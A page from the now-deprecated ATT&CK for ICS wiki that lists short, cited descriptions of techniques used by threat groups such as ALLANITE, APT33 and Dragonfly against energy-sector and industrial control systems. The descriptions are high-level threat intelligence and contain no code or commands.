This site has been deprecated in favor of https://attack.mitre.org and will remain in place until 11/1/22.

Property:Has technique description

From attackics
Jump to navigation Jump to search

This is a property of type Text.

Showing 20 pages using this property.
G
[[Group/G0009|ALLANITE]] utilized spear phishing to gain access into energy sector environments.[[CiteRef::Allanite - EISAC - 201805]]  +
[[Group/G0009|ALLANITE]] leverages watering hole attacks to gain access into electric utilities.[[CiteRef::Allanite - Security week - 201805]]  +
[[Group/G0009|ALLANITE]] utilized credentials collected through phishing and watering hole attacks.[[CiteRef::Reference - Dragos - Allanite]]  +
[[Group/G0009|ALLANITE]] has been identified to collect and distribute screenshots of ICS systems such as HMIs.[[CiteRef::Reference - Dragos - Allanite]][[CiteRef::Alert - Russian APT TA18-074A - 201803]]  +
[[Group/G0003|APT33]] utilized PowerShell scripts to establish command and control and install files for execution.[[CiteRef::APT33 - Symantec elfin - 201903]][[CiteRef::Reference - Dragos - Magnallium]]  +
[[Group/G0003|APT33]] utilize backdoors capable of capturing screenshots once installed on a system.[[CiteRef::APT33 - Fireeye - 201709]][[CiteRef::APT33 - Elfin Stonedrill - 201703]]  +
[[Group/G0003|APT33]] sent spear phishing emails containing links to HTML application files, which were embedded with malicious code.[[CiteRef::APT33 - Fireeye - 201709]] [[Group/G0003|APT33]] has conducted targeted spear phishing campaigns against U.S. government agencies and private sector companies.[[CiteRef::APT33 - wired - 201906]]  +
<span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Group/G0006|Dragonfly 2.0]]</span></span></span></span> communicated with command and control over TCP ports 445 and 139 or UDP 137 or 138.[[CiteRef::Alert - CISA TA18-074A]]  +
<span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Group/G0006|Dragonfly 2.0]]</span></span></span></span> accessed workstations and servers within the corporate network that contained data from power generation control system environments. The files were related to the ICS and SCADA systems including vendor names and ICS reference documents such as wiring diagrams and panel layouts.[[CiteRef::Alert - CISA TA18-074A]]  +
<span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Group/G0006|Dragonfly 2.0]]</span></span></span></span> deleted indicators on staging and target devices by uninstalling software, removing event logs, batch scripts, screenshots, registry keys, documents, and tools they brought into the target networks.[[CiteRef::Alert - CISA TA18-074A]]  +
<span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Group/G0006|Dragonfly 2.0]]</span></span></span></span> has been reported to take screenshots of the GUI for ICS equipment, such as HMIs.[[CiteRef::Alert - CISA TA18-074A]]  +
[[Group/G0006|Dragonfly 2.0]] used the Phishery tool kit to conduct spear phishing attacks and gather credentials.[[CiteRef::Dragonfly 2.0 - Symantec]][[CiteRef::Dragonfly 2.0 - talos phishing - 201707]] [[Group/G0006|Dragonfly 2.0]] conducted a targeted spear phishing campaign against multiple electric utilities in the North America.[[CiteRef::Dragonfly 2.0 - Dragos - 201809]][[CiteRef::Dragonfly 2.0 - Dragos activity groups - 2018]]  +
<span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Group/G0006|Dragonfly 2.0]]</span></span></span></span> utilized watering hole attacks to gather credentials, by compromising websites that energy sector organizations might access.[[CiteRef::Dragonfly 2.0 - Symantec]] A line of code is injected into the header.php file, this is used to redirect the visitors to an adversary controlled IP.[[CiteRef::Alert - CISA TA18-074A]]  +
<span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Group/G0006|Dragonfly 2.0]]</span></span></span></span> deleted indicators on staging and target devices by uninstalling software, removing event logs, batch scripts, screenshots, registry keys, documents, and tools they brought into the target networks.[[CiteRef::Alert - CISA TA18-074A]]  +
<span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Group/G0006|Dragonfly 2.0]]</span></span></span></span> leveraged compromised user credentials to access the targets networks and download tools from a remote server.[[CiteRef::Reference - Dragos - Dymalloy]][[CiteRef::Alert - CISA TA18-074A]]  +
<span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Group/G0006|Dragonfly 2.0]]</span></span></span></span> captured ICS vendor names, reference documents, wiring diagrams, and panel layouts about the process environment.[[CiteRef::Alert - CISA TA18-074A]]  +
[[Group/G0006|Dragonfly 2.0]] trojanized legitimate software to deliver malware disguised as standard windows applications.[[CiteRef::Dragonfly 2.0 - Symantec]]  +
<span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Group/G0002|Dragonfly]]</span></span></span></span> conducted a targeted phishing campaign against energy sector executives and senior personnel. Deceptive subject lines were used to portray a high importance. Malicious PDFs were then used to infect the user’s device.[[CiteRef::Symantec Dragonfly]]  +
<span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Group/G0002|Dragonfly]]</span></span></span></span> trojanized legitimate ICS equipment providers software packages available for download on their websites.[[CiteRef::Symantec Dragonfly]]  +
<span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Group/G0002|Dragonfly]]</span></span></span></span> utilized watering hole attacks on energy sector websites by injecting a redirect iframe to deliver <span class="smw-format list-format "><span class="smw-row"><span class="smw-field"><span class="smw-value">[[Software/S0003|Backdoor.Oldrea]]</span></span></span></span> or [https://attack.mitre.org/software/S0094/ Trojan.Karagany].[[CiteRef::Symantec Dragonfly]]  +